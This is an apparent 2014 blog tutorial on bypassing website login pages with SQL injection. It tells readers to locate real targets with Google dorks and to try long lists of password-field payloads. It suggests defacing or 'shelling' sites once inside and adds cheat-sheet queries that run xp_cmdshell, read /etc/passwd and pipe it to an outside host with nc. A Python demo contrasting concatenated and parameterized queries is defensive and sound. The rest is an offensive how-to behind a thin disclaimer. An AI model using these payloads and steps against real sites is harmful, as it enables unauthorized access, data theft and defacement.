Friday 29 August 2014

BASIC SQL INJECTION WITH LOGIN QUERIES


Alright, in this tutorial we'll be learning how to bypass login pages with the help of MySQL injection using login queries.

What is SQL injection?
Answer: Basically, it's a technique where you get a website to run a query of your own in order to extract information such as login details, user lists etc. from the website's database, for either personal gain or random use.
There are many types of queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is a basic SQL injection query that can be executed on a login page.
Example:

Code:

Username: admin
Password: ' or '1'='1

When you enter the password ' or '1'='1 on most websites, there's a chance you can gain access.
How does it happen? Look at the query the site runs when we submit that input:

SQL Code (the query built by the PHP login script):

SELECT * FROM users
WHERE username = 'admin' AND password = '' or '1'='1'

In the password field, we inserted a quote ' first, which closes the password string, and then an extra condition like '1'='1.
The database evaluates the WHERE clause for every row, and because or '1'='1' is always true the query returns rows even though the password is wrong, so the login script sees a result and treats the login as correct.
However, some websites filter out these types of queries, so it's best to try different ones too. You can find some below.
Now that you have an idea of how basic SQL injection queries work, let's try and put it to use, shall we?
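As an added example (not the tutorial's own code), here is the concatenated login query above rebuilt in Python against an in-memory SQLite database, next to the same check written with bound parameters, both run with password payloads taken from the list later in this post. The users table, its two rows and the credentials are constructed for the demo; the table and column names match the query shown above.

```python
import sqlite3

# Constructed demo database (my assumption, not the tutorial's site): a users
# table with two rows, so we can see how many rows an injected query matches.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation, the shape shown in the
    tutorial's query above. Any quote in the input becomes SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    rows = conn.execute(sql).fetchall()
    # Typical buggy check: "at least one row came back, so the login is valid".
    return len(rows) > 0

def login_parameterized(conn, username, password):
    """Same check with bound parameters: the driver passes the input as data,
    so a quote in the password is compared literally, never parsed as SQL."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()
    return len(rows) > 0

# Password-field payloads from the tutorial's list. Each closes the password
# string and appends an always-true condition; '--' comments out the trailing quote.
PAYLOADS = ["' or '1'='1", "' or 'x'='x", "' or 0=0 --", "' or 1=1--"]

def run_payloads(login_fn):
    """Returns {payload: accepted?} for username 'admin' and each payload."""
    return {p: login_fn(make_db(), "admin", p) for p in PAYLOADS}

def rows_matched_by_injection(payload="' or '1'='1"):
    """Shows that the injected query matches every user, not a single row."""
    conn = make_db()
    sql = ("SELECT username FROM users WHERE username = 'admin' AND password = '"
           + payload + "'")
    return [r[0] for r in conn.execute(sql).fetchall()]

if __name__ == "__main__":
    print("vulnerable:    ", run_payloads(login_vulnerable))
    print("parameterized: ", run_payloads(login_parameterized))
    print("rows matched:  ", rows_matched_by_injection())
```

The concatenated version accepts every payload and the injected query matches both users; the parameterized version accepts only the real credentials.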

Step1: Finding websites with login pages
Alright, our basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
In this tutorial, we can use these dorks:

Code:

inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html

If you want to find more dorks to use with this method, you can search for them on Google:

Step2: Executing the query

Alright, now that you've found your target with a login page, let's play with it a bit.
So here's what you're gonna do.
The username will be admin, because most sites have an admin account stored in their database.

Code:

Username: admin
Password: ' or 0=0 --

Didn't work? No worries, there's more to this than just a single query.
Here's a list of password payloads you can use to hopefully inject the site.

Code:



  • ' or '1'='1

  • ' or 'x'='x

  • ' or 0=0 --

  • " or 0=0 --

  • or 0=0 --

  • ' or 0=0 #

  • " or 0=0 #

  • or 0=0 #

  • ' or 'x'='x

  • " or "x"="x

  • ') or ('x'='x

  • ' or 1=1--

  • " or 1=1--

  • or 1=1--

  • ' or a=a--

  • " or "a"="a

  • ') or ('a'='a

  • ") or ("a"="a

  • hi" or "a"="a

  • hi" or 1=1 --

  • hi' or 1=1 --

  • 'or'1=1'

  • ==

  • and 1=1--

  • and 1=1

  • ' or 'one'='one--

  • ' or 'one'='one

  • ' and 'one'='one

  • ' and 'one'='one--

  • 1') and '1'='1--

  • admin' --

  • admin' #

  • admin'/*

  • or 1=1--

  • or 1=1#

  • or 1=1/*

  • ) or '1'='1--

  • ) or ('1'='1--

Note: Sometimes this is not the best way of hacking websites with SQL injection, but I guarantee that, with patience, you'll become a successful SQL injector and get used to this method.

Step3: I LOGGED in, what to do now?!
Well, first off, if you did log in, then congrats on your first successful attempt at SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it.
Others will just shell it and have other uses such as rooting, webhosting etc.
If you would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon. Now you might wanna watch the video so that you'll get the idea of how I log in as an administrator on an SQLi vulnerable website.

Extras:
Common Password Queries:

Code:



  • admin' --

  • admin' #

  • admin'/*

  • ' or 1=1--

  • ' or 1=1#

  • ' or 1=1/*

  • ') or '1'='1--

  • ') or ('1'='1--


If the database version is greater than 5, then queries with UNION, GROUP BY, @@version, ORDER BY, BENCHMARK etc. can be executed:

Code:



  • 1234' AND 1=0 UNION ALL SELECT 'admin'

  • ' HAVING 1=1 --

  • ' GROUP BY table.columnfromerror1 HAVING 1=1 --

  • @@version

  • select @@version

  • select @@servername

  • select @@microsoftversion

  • select * from master..sysservers

  • select * from sysusers

  • exec master..xp_cmdshell 'ipconfig+/all'

  • exec master..xp_cmdshell 'net+view'

  • exec master..xp_cmdshell 'net+users'

  • SELECT 1 -- comment

  • SELECT /*comment*/1

  • ORDER BY 1--

  • ' union all select sum(columntofind) from users--

  • UNION ALL SELECT null

  • SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

  • SELECT TOP n columns

  • select * from OPENROWSET('MSDASQL'

  • select * from OPENROWSET('SQLOLEDB'

  • master..sysxlogins

  • sys.sql_logins

  • SELECT/*avoid-spaces*/password/**/FROM/**/Members

  • SELECT CHAR(0x66)

  • SELECT * FROM members

  • @@version

  • SELECT USER();

  • select host

  • SELECT 1;

  • SELECT /*comment*/1;

  • ORDER BY 1--

  • UNION ALL SELECT null

  • SELECT schema_name FROM information_schema.schemata;

  • SELECT table_schema

  • SELECT grantee

  • limit 1

  • SELECT host

  • IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100

  • select benchmark( 500

  • SELECT CHAR(75)+CHAR(76)+CHAR(77)

  • SELECT ascii('A')

  • SELECT CONCAT('0x'

  • SELECT/*avoid-spaces*/password/**/FROM/**/Members

  • SELECT /*!32302 1/0

  • SELECT 0x5045

  • SELECT cast('1' AS unsigned integer);

  • SELECT cast('123' AS char);

  • SELECT IF(1=1

  • ' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a

  • union SELECT LOAD_FILE(0x2f6574632f706173737764)

  • load data infile 'c:/boot.ini' into table foo;

  • # SELECT ... INTO DUMPFILE

  • SELECT login || '-' || password FROM members

  • select versionnumber

  • select user from sysibm.sysdummy1;

  • select session_user from sysibm.sysdummy1;

  • select system_user from sysibm.sysdummy1;

  • select * from syscat.tabauth;

  • select current server from sysibm.sysdummy1;

  • select * from syscat.dbauth where grantee = current user;

  • select * from syscat.tdbauth where grantee = current user;

  • select name from sysibm.systables;

  • select name

  • SELECT schemaname FROM syscat.schemata;

  • SELECT foo FROM bar fetch first 1 rows only;

  • select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

  • select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;

  • SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1;

  • SELECT cast('123' as integer) FROM sysibm.sysdummy1;

  • select version();

  • select current_database();

  • select current_user;

  • select session_user;

  • SELECT current_setting('data_directory');

  • select current_setting('log_connections');

  • select current_setting('log_statement');

  • select current_setting('port');

  • select current_setting('password_encryption');

  • select current_setting('krb_server_keyfile');

  • select current_setting('virtual_host');

  • select current_setting('config_file');

  • select current_setting('hba_file');

  • LIMIT n

  • SELECT pg_sleep(10);

  • SELECT current_database()

  • SELECT relname

  • SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'

  • SELECT DISTINCT relname FROM pg_class C

  • SELECT 1; --comment

  • SELECT /*comment*/1;

  • SELECT chr(65);

  • SELECT ascii('A');

  • SELECT CHR(65)||CHR(66);

  • SELECT usename

  • SELECT usename FROM pg_user WHERE usesuper IS TRUE

  • SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');

  • SELECT 'A' || 'B';

  • SELECT CAST(1 as varchar);

  • SELECT CAST('1' as int);

  • SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'

  • select dbmsinfo('_version');

  • select dbmsinfo('session_user');

  • select dbmsinfo('system_user');

  • select dbmsinfo('database');

  • select dbmsinfo('db_admin');

  • select dbmsinfo('create_table');

  • select dbmsinfo('create_procedure');

  • select dbmsinfo('security_priv');

  • select dbmsinfo('select_syscat');

  • select dbmsinfo('db_privileges');

  • select dbmsinfo('current_priv_mask');

  • select top 10 blah from table;

  • select first 10 blah from table;

  • select table_name

  • select relid

  • select relid

  • select column_name

  • select 1 union select 2;

  • select cast('123' as integer);

  • select @@version

  • select name from master..syslogins

  • select name from master..sysdatabases

  • convert(integer

  • waitfor delay '0:0:5'


Database versions lower than 5 (i.e. version 4) cannot accept the UNION-style queries used on version 5.

I tried injecting many of them and it worked, so it should work for you too.
Good luck!

Note:

All information on this forum is for educational purposes only.
We are not responsible for any attacks that are carried out on networks, websites or servers.